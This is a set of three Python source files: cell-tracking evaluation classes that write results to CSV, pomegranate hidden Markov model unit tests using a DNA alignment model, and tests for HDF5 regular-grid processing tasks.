return "frame={0},id={1},position={2},color={3}".format(self.frame_number, self.get_id(), self.position,
self.colour)
class TrackingLink(object):
def __init__(self, cell_A, cell_B):
self.cell_A = cell_A
self.cell_B = cell_B
def __hash__(self):
return hash(self.cell_A) ^ hash(self.cell_B)
def __eq__(self, other):
return self.cell_A == other.cell_A and self.cell_B == other.cell_B
def __str__(self):
return "({0}-{1})".format(self.cell_A, self.cell_B)
def Enum(*sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.items())
enums['reverse_mapping'] = reverse
return type('Enum', (), enums)
EvaluationResult = Enum("CORRECT", "FALSE_POSITIVE", "FALSE_NEGATIVE", "UNKNOWN")
class EvaluationDetail(object):
"""Encapsulates the information about the evaluation results for further investigation.
Attributes:
frame - when the evaluation occurs
result - overall result description
"""
def __init__(self, frame, result):
self.result = result
self.frame = parse_file_order(frame)
def __str__(self):
return "{0} - {1}".format(self.frame, EvaluationResult.reverse_mapping[self.result])
def calculate_result(self, GT, algo):
if GT is not None and algo is not None:
result = EvaluationResult.CORRECT
elif GT is not None:
result = EvaluationResult.FALSE_NEGATIVE
elif algo is not None:
result = EvaluationResult.FALSE_POSITIVE
else:
result = EvaluationResult.UNKNOWN
return result
@staticmethod
def csv_headers():
return ["Frame", "Result"]
def csv_record(self):
return [self.frame, EvaluationResult.reverse_mapping[self.result]]
def csv_read(self, record):
self.frame = parse_file_order(record[0])
self.result = EvaluationResult.__getattribute__(EvaluationResult, record[1])
return record[2:]
class SegmentationResult(EvaluationDetail):
"""Contains the positions of the both ground truth and corresponding cell from the algorithm results. Potentially one of them is non-existent (False positive/negative).
Attributes:
cell_GT - cell from ground truth
cell_algo - cell found by an algorithm
"""
def __init__(self, cell_gt=None, cell_algo=None):
self.iou = None
if (not (cell_gt is None and cell_algo is None)):
EvaluationDetail.__init__(self, (cell_gt or cell_algo).frame_number,
self.calculate_result(cell_gt, cell_algo))
self.cell_GT = cell_gt
self.cell_algo = cell_algo
if cell_gt is not None and cell_algo is not None:
self.iou = self.cell_GT.iou(self.cell_algo)
else:
self.cell_GT = None
self.cell_algo = None
def __str__(self):
return "{0}: GT={1}, ALGO={2}".format(EvaluationDetail.__str__(self), self.cell_GT, self.cell_algo)
@staticmethod
def csv_headers():
return EvaluationDetail.csv_headers() + ["GT_id", "GT_pos_x", "GT_pos_y", "Algo_id", "Algo_pos_x", "Algo_pos_y",
"IOU"]
def csv_record(self):
record = EvaluationDetail.csv_record(self)
def print_cell(record, cell):
if cell:
record = record + [cell.cell_id] + list(cell.position)
else:
record = record + ["", "", ""]
return record
record = print_cell(record, self.cell_GT)
record = print_cell(record, self.cell_algo)
record += [self.iou]
return record
def csv_read(self, record):
record = EvaluationDetail.csv_read(self, record)
def read_cell(record):
return CellOccurence(self.frame, record[0], -1, (float(record[1]), float(record[2])))
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_NEGATIVE:
self.cell_GT = read_cell(record)
record = record[3:]
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_POSITIVE:
self.cell_algo = read_cell(record)
record = record[3:]
return record
@staticmethod
def csv_init(record):
sr = SegmentationResult()
sr.csv_read(record)
return sr
class TrackingResult(EvaluationDetail):
"""Contains the tracking links from both the ground truth and from the algorithm results. Potentially one of them is non-existent (False positive/negative).
Attributes:
prev_frame - number of the frame from which comes the other ends of the links
link_GT - link from ground truth
link_algo - link found by an algorithm
"""
def __init__(self, link_gt=None, link_algo=None):
if (not (link_gt is None and link_algo is None)):
EvaluationDetail.__init__(self, (link_gt or link_algo).cell_B.frame_number,
self.calculate_result(link_gt, link_algo))
self.prev_frame = (link_gt or link_algo).cell_A.frame_number
self.link_GT = link_gt
self.link_algo = link_algo
else:
self.link_GT = None
self.link_algo = None
def __str__(self):
return "{0}: GT_LINK={1}, ALGO_LINK={2}".format(EvaluationDetail.__str__(self), self.link_GT, self.link_algo)
@staticmethod
def csv_headers():
return EvaluationDetail.csv_headers() + ["Prev_frame",
"GT_unique_id", "GT_pos0_x", "GT_pos0_y", "GT_pos1_x", "GT_pos1_y",
"Algo_unique_id", "Algo_pos0_x", "Algo_pos0_y", "Algo_pos1_x",
"Algo_pos1_y"]
def csv_record(self):
record = EvaluationDetail.csv_record(self) + [self.prev_frame]
def print_link(record, link):
'@type link: TrackingLink'
if link:
record = record + [link.cell_A.unique_id] + list(link.cell_A.position) + list(link.cell_B.position)
else:
record = record + ["", "", "", "", ""]
return record
record = print_link(record, self.link_GT)
record = print_link(record, self.link_algo)
return record
def csv_read(self, record):
record = EvaluationDetail.csv_read(self, record)
self.prev_frame = parse_file_order(record[0])
record = record[1:]
def read_link(record, strip_record=False):
unique_id, pos0_x, pos0_y, pos1_x, pos1_y = tuple(record[:5])
if strip_record:
del record[:5]
return TrackingLink(CellOccurence(self.prev_frame, unique_id, unique_id, (float(pos0_x), float(pos0_y))),
CellOccurence(self.frame, unique_id, unique_id, (float(pos1_x), float(pos1_y))))
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_NEGATIVE:
self.link_GT = read_link(record)
del record[:5]
if self.result == EvaluationResult.CORRECT or self.result == EvaluationResult.FALSE_POSITIVE:
self.link_algo = read_link(record)
del record[:5]
return record
@staticmethod
def csv_init(record):
sr = TrackingResult()
sr.csv_read(record)
return sr
|
from __future__ import (division, print_function)
from pomegranate import *
from nose.tools import with_setup
from nose.tools import assert_equal
from nose.tools import assert_not_equal
from nose.tools import assert_raises
import random
import numpy as np
import json
def setup():
'''
Build a model that we want to use to test sequences. This model will
be somewhat complicated, in order to extensively test YAHMM. This will be
a three state global sequence alignment HMM. The HMM models a reference of
'ACT', with pseudocounts to allow for slight deviations from this
reference.
'''
random.seed(0)
global model
model = HiddenMarkovModel( "Global Alignment")
# Define the distribution for insertions
i_d = DiscreteDistribution( { 'A': 0.25, 'C': 0.25, 'G': 0.25, 'T': 0.25 } )
# Create the insert states
i0 = State( i_d, name="I0" )
i1 = State( i_d, name="I1" )
i2 = State( i_d, name="I2" )
i3 = State( i_d, name="I3" )
# Create the match states
m1 = State( DiscreteDistribution({ "A": 0.95, 'C': 0.01, 'G': 0.01, 'T': 0.02 }) , name="M1" )
m2 = State( DiscreteDistribution({ "A": 0.003, 'C': 0.99, 'G': 0.003, 'T': 0.004 }) , name="M2" )
m3 = State( DiscreteDistribution({ "A": 0.01, 'C': 0.01, 'G': 0.01, 'T': 0.97 }) , name="M3" )
# Create the delete states
d1 = State( None, name="D1" )
d2 = State( None, name="D2" )
d3 = State( None, name="D3" )
# Add all the states to the model
model.add_states( [i0, i1, i2, i3, m1, m2, m3, d1, d2, d3 ] )
# Create transitions from match states
model.add_transition( model.start, m1, 0.9 )
model.add_transition( model.start, i0, 0.1 )
model.add_transition( m1, m2, 0.9 )
model.add_transition( m1, i1, 0.05 )
model.add_transition( m1, d2, 0.05 )
model.add_transition( m2, m3, 0.9 )
model.add_transition( m2, i2, 0.05 )
model.add_transition( m2, d3, 0.05 )
model.add_transition( m3, model.end, 0.9 )
model.add_transition( m3, i3, 0.1 )
# Create transitions from insert states
model.add_transition( i0, i0, 0.70 )
model.add_transition( i0, d1, 0.15 )
model.add_transition( i0, m1, 0.15 )
model.add_transition( i1, i1, 0.70 )
model.add_transition( i1, d2, 0.15 )
model.add_transition( i1, m2, 0.15 )
model.add_transition( i2, i2, 0.70 )
model.add_transition( i2, d3, 0.15 )
model.add_transition( i2, m3, 0.15 )
model.add_transition( i3, i3, 0.85 )
model.add_transition( i3, model.end, 0.15 )
# Create transitions from delete states
model.add_transition( d1, d2, 0.15 )
model.add_transition( d1, i1, 0.15 )
model.add_transition( d1, m2, 0.70 )
model.add_transition( d2, d3, 0.15 )
model.add_transition( d2, i2, 0.15 )
model.add_transition( d2, m3, 0.70 )
model.add_transition( d3, i3, 0.30 )
model.add_transition( d3, model.end, 0.70 )
# Call bake to finalize the structure of the model.
model.bake()
def multitransition_setup():
'''
Build a model that we want to use to test sequences. This is the same as the
above model, except that it uses the multiple transition methods for building.
'''
random.seed(0)
global model
model = HiddenMarkovModel( "Global Alignment")
# Define the distribution for insertions
i_d = DiscreteDistribution( { 'A': 0.25, 'C': 0.25, 'G': 0.25, 'T': 0.25 } )
# Create the insert states
i0 = State( i_d, name="I0" )
i1 = State( i_d, name="I1" )
i2 = State( i_d, name="I2" )
i3 = State( i_d, name="I3" )
# Create the match states
m1 = State( DiscreteDistribution({ "A": 0.95, 'C': 0.01, 'G': 0.01, 'T': 0.02 }) , name="M1" )
m2 = State( DiscreteDistribution({ "A": 0.003, 'C': 0.99, 'G': 0.003, 'T': 0.004 }) , name="M2" )
m3 = State( DiscreteDistribution({ "A": 0.01, 'C': 0.01, 'G': 0.01, 'T': 0.97 }) , name="M3" )
# Create the delete states
d1 = State( None, name="D1" )
d2 = State( None, name="D2" )
d3 = State( None, name="D3" )
# Add all the states to the model
model.add_states( [i0, i1, i2, i3, m1, m2, m3, d1, d2, d3 ] )
# Create transitions from match states
model.add_transitions( model.start, [m1, i0], [0.9, 0.1] )
model.add_transitions( m1, [m2, i1, d2], [0.9, 0.05, 0.05] )
model.add_transitions( m2, [m3, i2, d3], [0.9, 0.05, 0.05] )
model.add_transitions( m3, [model.end, i3], [0.9, 0.1] )
# Create transitions from insert states
model.add_transitions( i0, [i0, d1, m1], [0.7, 0.15, 0.15] )
model.add_transitions( i1, [i1, d2, m2], [0.7, 0.15, 0.15] )
model.add_transitions( i2, [i2, d3, m3], [0.7, 0.15, 0.15] )
model.add_transitions( [i3, i3], [i3, model.end], [0.85, 0.15] )
# Create transitions from delete states
model.add_transitions( d1, [d2, i1, m2], [0.15, 0.15, 0.70] )
model.add_transitions( [d2, d2, d2, d3, d3], [d3, i2, m3, i3, model.end],
[0.15, 0.15, 0.70, 0.30, 0.70 ] )
# Call bake to finalize the structure of the model.
model.bake()
def tied_edge_setup():
'''
Build a model that we want to use to test sequences. This model has
tied edges.
'''
random.seed(0)
global model
model = HiddenMarkovModel( "Global Alignment")
# Define the distribution for insertions
i_d = DiscreteDistribution( { 'A': 0.25, 'C': 0.25, 'G': 0.25, 'T': 0.25 } )
# Create the insert states
i0 = State( i_d, name="I0" )
i1 = State( i_d, name="I1" )
i2 = State( i_d, name="I2" )
i3 = State( i_d, name="I3" )
# Create the match states
m1 = State( DiscreteDistribution({ "A": 0.95, 'C': 0.01, 'G': 0.01, 'T': 0.02 }) , name="M1" )
m2 = State( DiscreteDistribution({ "A": 0.003, 'C': 0.99, 'G': 0.003, 'T': 0.004 }) , name="M2" )
m3 = State( DiscreteDistribution({ "A": 0.01, 'C': 0.01, 'G': 0.01, 'T': 0.97 }) , name="M3" )
# Create the delete states
d1 = State( None, name="D1" )
d2 = State( None, name="D2" )
d3 = State( None, name="D3" )
# Add all the states to the model
model.add_states( [i0, i1, i2, i3, m1, m2, m3, d1, d2, d3 ] )
# Create transitions from match states
model.add_transition( model.start, m1, 0.9 )
model.add_transition( model.start, i0, 0.1 )
model.add_transition( m1, m2, 0.9 )
model.add_transition( m1, i1, 0.05 )
model.add_transition( m1, d2, 0.05 )
model.add_transition( m2, m3, 0.9 )
model.add_transition( m2, i2, 0.05 )
model.add_transition( m2, d3, 0.05 )
model.add_transition( m3, model.end, 0.9 )
model.add_transition( m3, i3, 0.1 )
# Create transitions from insert states
model.add_transition( i0, i0, 0.70, group="i_a" )
model.add_transition( i0, d1, 0.15, group="i_b" )
model.add_transition( i0, m1, 0.15, group="i_c" )
model.add_transition( i1, i1, 0.70, group="i_a" )
model.add_transition( i1, d2, 0.15, group="i_b" )
model.add_transition( i1, m2, 0.15, group="i_c" )
model.add_transition( i2, i2, 0.70, group="i_a" )
model.add_transition( i2, d3, 0.15, group="i_b" )
model.add_transition( i2, m3, 0.15, group="i_c" )
model.add_transition( i3, i3, 0.85, group="i_a" )
model.add_transition( i3, model.end, 0.15 )
# Create transitions from delete states
model.add_transition( d1, d2, 0.15, group="d_a" )
model.add_transition( d1, i1, 0.15, group="d_b" )
model.add_transition( d1, m2, 0.70, group="d_c" )
model.add_transition( d2, d3, 0.15, group="d_a" )
model.add_transition( d2, i2, 0.15, group="d_b" )
model.add_transition( d2, m3, 0.70, group="d_c" )
model.add_transition( d3, i3, 0.30 )
model.add_transition( d3, model.end, 0.70 )
# Call bake to finalize the structure of the model.
model.bake()
def teardown():
'''
Remove the model at the end of the unit testing. Since it is stored in a
global variance, simply delete it.
'''
pass
@with_setup( setup, teardown )
def test_same_length_viterbi():
scores = [ -0.5132449003570658, -11.048101241343396, -9.125519674022627,
-5.0879558788604475 ]
sequences = [ list(x) for x in [ 'ACT', 'GGC', 'GAT', 'ACC' ] ]
for seq, score in zip( sequences, scores ):
assert_equal( model.viterbi( seq )[0], score )
assert_raises( ValueError, model.viterbi, list('XXX') )
@with_setup( setup, teardown )
def test_variable_length_viterbi():
scores = [ -5.406181012423981, -10.88681993576597, -3.6244718790494277,
-3.644880750680635, -10.674332964640293, -10.393824835172445,
-8.67126440174503, -16.903451796110275, -16.451699654050792 ]
sequences = [ list(x) for x in ('A', 'GA', 'AC', 'AT', 'ATCC',
'ACGTG', 'ATTT', 'TACCCTC', 'TGTCAACACT') ]
for seq, score in zip( sequences, scores ):
assert_equal( model.viterbi( seq )[0], score )
@with_setup( setup, teardown )
def test_log_probability():
scores = [ -5.3931, -0.5052, -11.8478, -14.3482 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
for seq, score in zip( sequences, scores ):
assert_equal( round( model.log_probability( seq ), 4 ), score )
@with_setup( setup, teardown )
def test_posterior_transitions():
a_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
b_scores = [ 0.013, 0.0036, 1.9836, 2.145 ]
c_scores = [ 0.013, 0.0035, 0.817, 0.477 ]
d_scores = [ 1.0, 0.0023, 0.2636, 0.3682 ]
t_scores = [ 4.013, 4.0083, 6.457, 8.9812 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['I2'], indices['I0'], indices['D1'], indices['D2']
scores = zip( sequences, a_scores, b_scores, c_scores, d_scores, t_scores )
for seq, a, b, c, d, t in scores:
trans, ems = model.forward_backward( seq )
assert_equal( round( trans[i].sum(), 4 ), a )
assert_equal( round( trans[j].sum(), 4 ), b )
assert_equal( round( trans[k].sum(), 4 ), c )
assert_equal( round( trans[l].sum(), 4 ), d )
assert_equal( round( trans.sum(), 4 ), t )
@with_setup( setup, teardown )
def test_posterior_transitions_w_training():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2 = indices['I0'], indices['I1'], indices['I2']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False )
transitions = model.dense_transition_matrix()
assert_not_equal( transitions[d1, i1], transitions[d2, i2] )
assert_not_equal( transitions[i0, m1], transitions[i1, m2] )
assert_not_equal( transitions[d1, d2], transitions[d2, d3] )
assert_not_equal( transitions[i0, d1], transitions[i1, d2] )
assert_not_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( setup, teardown )
def test_posterior_transitions_w_vtraining():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2, i3 = indices['I0'], indices['I1'], indices['I2'], indices['I3']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False, algorithm='viterbi' )
transitions = model.dense_transition_matrix()
assert_not_equal( transitions[i0, i0], transitions[i1, i1] )
assert_not_equal( transitions[d1, d2], transitions[d2, d3] )
assert_not_equal( transitions[i0, d1], transitions[i1, d2] )
assert_not_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( tied_edge_setup, teardown )
def test_posterior_transitions_w_tied_training():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2, i3 = indices['I0'], indices['I1'], indices['I2'], indices['I3']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False )
transitions = model.dense_transition_matrix()
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( tied_edge_setup, teardown )
def test_posterior_transitions_w_tied_vtraining():
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
transitions = model.dense_transition_matrix()
i0, i1, i2 = indices['I0'], indices['I1'], indices['I2']
d1, d2, d3 = indices['D1'], indices['D2'], indices['D3']
m1, m2, m3 = indices['M1'], indices['M2'], indices['M3']
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
model.fit( sequences, verbose=False, algorithm='viterbi' )
transitions = model.dense_transition_matrix()
assert_equal( transitions[d1, i1], transitions[d2, i2] )
assert_equal( transitions[i0, i0], transitions[i1, i1] )
assert_equal( transitions[i0, i0], transitions[i2, i2] )
assert_equal( transitions[i0, m1], transitions[i1, m2] )
assert_equal( transitions[d1, d2], transitions[d2, d3] )
assert_equal( transitions[i0, d1], transitions[i1, d2] )
assert_equal( transitions[i0, d1], transitions[i2, d3] )
@with_setup( setup, teardown )
def test_posterior_emissions():
a_scores = [ 0.987, 0.9965, 0.183, 0.523 ]
b_scores = [ 0.0, 0.9977, 0.7364, 0.6318 ]
c_scores = [ 0.0, 0.9975, 0.6237, 0.8641 ]
d_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['M1'], indices['M2'], indices['M3'], indices['I2']
for seq, a, b, c, d in zip( sequences, a_scores, b_scores, c_scores, d_scores ):
trans, ems = model.forward_backward( seq )
ems = np.exp( ems )
assert_equal( round( ems[:,i].sum(), 4 ), a )
assert_equal( round( ems[:,j].sum(), 4 ), b )
assert_equal( round( ems[:,k].sum(), 4 ), c )
assert_equal( round( ems[:,l].sum(), 4 ), d )
assert_equal( round( ems.sum() ), len( seq ) )
@with_setup( multitransition_setup, teardown )
def test_posterior_emissions_w_multitransition_setup():
a_scores = [ 0.987, 0.9965, 0.183, 0.523 ]
b_scores = [ 0.0, 0.9977, 0.7364, 0.6318 ]
c_scores = [ 0.0, 0.9975, 0.6237, 0.8641 ]
d_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['M1'], indices['M2'], indices['M3'], indices['I2']
for seq, a, b, c, d in zip( sequences, a_scores, b_scores, c_scores, d_scores ):
trans, ems = model.forward_backward( seq )
ems = np.exp( ems )
assert_equal( round( ems[:,i].sum(), 4 ), a )
assert_equal( round( ems[:,j].sum(), 4 ), b )
assert_equal( round( ems[:,k].sum(), 4 ), c )
assert_equal( round( ems[:,l].sum(), 4 ), d )
assert_equal( round( ems.sum() ), len( seq ) )
@with_setup( tied_edge_setup, teardown )
def test_posterior_emissions_w_tied_edge_setup():
a_scores = [ 0.987, 0.9965, 0.183, 0.523 ]
b_scores = [ 0.0, 0.9977, 0.7364, 0.6318 ]
c_scores = [ 0.0, 0.9975, 0.6237, 0.8641 ]
d_scores = [ 0.0, 0.0021, 0.2017, 1.5105 ]
sequences = [ list(x) for x in ( 'A', 'ACT', 'GGCA', 'TACCTGT' ) ]
indices = { state.name: i for i, state in enumerate( model.states ) }
i, j, k, l = indices['M1'], indices['M2'], indices['M3'], indices['I2']
for seq, a, b, c, d in zip( sequences, a_scores, b_scores, c_scores, d_scores ):
trans, ems = model.forward_backward( seq )
ems = np.exp( ems )
assert_equal( round( ems[:,i].sum(), 4 ), a )
assert_equal( round( ems[:,j].sum(), 4 ), b )
assert_equal( round( ems[:,k].sum(), 4 ), c )
assert_equal( round( ems[:,l].sum(), 4 ), d )
assert_equal( round( ems.sum() ), len( seq ) )
@with_setup( setup, teardown )
def test_properties():
assert_equal( model.edge_count(), 29 )
assert_equal( model.state_count(), 12 )
assert_equal( model.name, "Global Alignment" )
@with_setup( setup, teardown )
def test_to_json():
b = json.loads( model.to_json() )
assert_equal( b['name'], 'Global Alignment' )
assert_equal( len(b['edges']), 29 )
assert_equal( len(b['states']), 12 )
assert_equal( b['silent_index'], 7 )
@with_setup( setup, teardown )
def test_from_json():
hmm = HiddenMarkovModel.from_json( model.to_json() )
assert_equal( hmm.edge_count(), 29 )
assert_equal( hmm.state_count(), 12 )
assert_equal( hmm.name, "Global Alignment" )
|
# -*- coding: utf-8 -*-
import unittest
import os
from contextlib import contextmanager
import itertools
import threading
import numpy as np
from .test_task import test_task
from .. import h5regulargrid
from ...io import nxfs
from ...utils.tests import genindexing
from .. import utils
from .. import nxwrap
from .. import axis
from ...utils import units
from ...io import target
class test_task_generic(test_task):
@contextmanager
def _nxprocess(self, method=None):
h5filename = os.path.join(self.dir.path, "test.h5")
root = nxfs.Path("/", h5file=h5filename).nxroot()
entry = root.new_nxentry()
parameters = {"name": "fromraw", "a": 1, "b": 2}
name = target.prepare(parameters["name"])
nxprocess = entry.nxprocess(name, parameters=parameters, dependencies=None)
info = {}
shape = (2, 10, 13)
self.stackdim = 0
nstack, nhor, nvert = shape
nstack = nstack
z = "z", range(nvert), {"units": "um", "title": "vertical"}
y = "y", range(nhor), {"units": "um", "title": "horizontal"}
x = "x", range(nstack), None
yencres = 2
zencres = 3
ypossmax = 4
zpossmax = 6
posmap = (
np.arange(nhor)[np.newaxis, :]
+ np.arange(nvert)[:, np.newaxis] / (nvert - 1.0) * ypossmax
)
yenc = np.stack([posmap.T * yencres] * nstack, axis=self.stackdim)
posmap = (
np.arange(nvert)[:, np.newaxis]
+ np.arange(nhor)[np.newaxis, :] / (nhor - 1.0) * zpossmax
)
zenc = np.stack([posmap.T * zencres] * nstack, axis=self.stackdim)
dtype = np.float32
signals = ["Fe-K", "Si-K", "Al-K", "S-K", "Ce-L"]
counters = ["arr_iodet", "arr_idet", "arr_samy", "arr_samz"]
if method == "replace":
index = tuple(
[np.random.randint(0, shape[i], 10).tolist() for i in range(3)]
)
indexinfo = list(index)
indexinfo.insert(self.stackdim, slice(None))
info["index"] = tuple(indexinfo)
elif method == "align":
info["axes"] = (
axis.factory(range(nstack)),
axis.factory(units.Quantity(range(-nstack + 1, nhor), units="um")),
axis.factory(units.Quantity(range(-nstack + 1, nvert), units="um")),
)
elif method == "expression":
info["expression"] = "{}/{arr_iodet}"
info["copy"] = ["arr_iodet"]
info["select"] = nxprocess.results["counters"]["arr_iodet"]
elif method == "copy":
info["expression"] = "{}"
info["copy"] = ["Fe-K", "Si-K"]
info["skip"] = [s for s in signals if s not in info["copy"]] + counters
elif method == "resample":
info["encoders"] = {
"y": {"counter": "arr_samy", "resolution": yencres},
"z": {"counter": "arr_samz", "resolution": zencres},
}
info["shift"] = {"y": ypossmax, "z": zpossmax}
groups = {}
for group in range(2):
groups["detector{:02d}".format(group)] = signals
groups["counters"] = counters
for group, signals in groups.items():
group = nxprocess.results.nxdata(group).mkdir()
positioners = nxprocess.results.positioners()
for name in signals:
if name == "arr_samy":
data = yenc
elif name == "arr_samz":
data = zenc
else:
data = np.random.normal(size=shape)
data = data.astype(dtype)
if method == "crop":
data[:, 0, :] = np.nan
data[:, -2:, :] = np.nan
data[:, :, 0:2] = np.nan
data[:, :, -1] = np.nan
info["y"] = y[1][1:-2]
info["z"] = z[1][2:-1]
elif method == "replace":
data[index] = -1
elif method == "minlog":
mi = np.min(data) * 1.1
if mi == 0:
mi = -1
data -= mi
elif method == "align":
hot = np.max(data) * 1.1
for i in range(nstack):
data[i, i, i] = hot
group.add_signal(name, data=data)
group.set_axes(x, y, z)
try:
yield nxprocess, info
finally:
# root.remove(recursive=True)
pass
def test_grid(self):
with self._nxprocess() as proc:
proc, info = proc
grid = h5regulargrid.NXRegularGrid(proc)
self._check_grid(grid)
nxdata = proc.results["detector00"]
grid = h5regulargrid.NXSignalRegularGrid(nxdata.signal)
self._check_grid(grid)
def test_crop(self):
with self._nxprocess(method="crop") as proc1:
proc1, info = proc1
parameters = {
"method": "crop",
"default": "Si-K",
"sliced": False,
"reference": "Al-K",
"nanval": np.nan,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
grid3 = h5regulargrid.NXRegularGrid(proc3)
self.assertEqual(
{sig.name for sig in grid1.signals}, {sig.name for sig in grid2.signals}
)
self.assertFalse(np.isnan(grid2.values).any())
np.testing.assert_array_equal(grid2.values, grid3.values)
for k, v in info.items():
for ax in grid2.axes:
if ax.name == k:
np.testing.assert_array_equal(ax.magnitude, v)
break
else:
assert False
self.assertEqual(proc1.default.signal.name, parameters["default"])
def test_replace(self):
with self._nxprocess(method="replace") as proc1:
proc1, info = proc1
parameters = {
"method": "replace",
"default": "Si-K",
"sliced": False,
"old": -1,
"new": -2,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
grid3 = h5regulargrid.NXRegularGrid(proc3)
self.assertEqual(
{sig.name for sig in grid1.signals}, {sig.name for sig in grid2.signals}
)
np.testing.assert_array_equal(grid2.values, grid3.values)
np.testing.assert_array_equal(
grid1.values[info["index"]], parameters["old"]
)
np.testing.assert_array_equal(
grid2.values[info["index"]], parameters["new"]
)
self.assertEqual(proc1.default.signal.name, parameters["default"])
def test_minlog(self):
with self._nxprocess(method="minlog") as proc1:
proc1, info = proc1
parameters = {"method": "minlog", "sliced": False}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
grid3 = h5regulargrid.NXRegularGrid(proc3)
self.assertEqual(
{sig.name for sig in grid1.signals}, {sig.name for sig in grid2.signals}
)
np.testing.assert_array_equal(grid2.values, grid3.values)
np.testing.assert_array_equal(-np.log(grid1), grid3.values)
def test_align(self):
with self._nxprocess(method="align") as proc1:
proc1, info = proc1
parameters = {
"method": "align",
"alignmethod": "max",
"reference": "Fe-K",
"refimageindex": 0,
"default": "Fe-K",
}
proc2 = self._run_task(parameters, proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
axes = grid2.axes
axes.pop(grid2.stackdim)
for ax1, ax2 in zip(info["axes"], axes):
self.assertEqual(ax1, ax2)
def test_expression(self):
with self._nxprocess(method="expression") as proc1:
proc1, info = proc1
copy = [{"method": "regex", "pattern": name} for name in info["copy"]]
parameters = {
"method": "expression",
"expression": info["expression"],
"copy": copy,
"sliced": False,
}
proc2 = self._run_task(parameters, proc1)
parameters["sliced"] = True
proc3 = self._run_task(parameters, proc1)
self._check_reproc(proc2, proc3)
grid1 = h5regulargrid.NXRegularGrid(proc1)
grid2 = h5regulargrid.NXRegularGrid(proc2)
self._check_axes(grid1, grid2)
index = grid1.locate(info["select"], None, None, None)
norm = grid1[index]
inorm = index[grid1.stackdim]
for i in range(grid1.shape[grid1.stackdim]):
index = list(index)
index[grid1.stackdim] = i
index = tuple(index)
data = grid1[index]
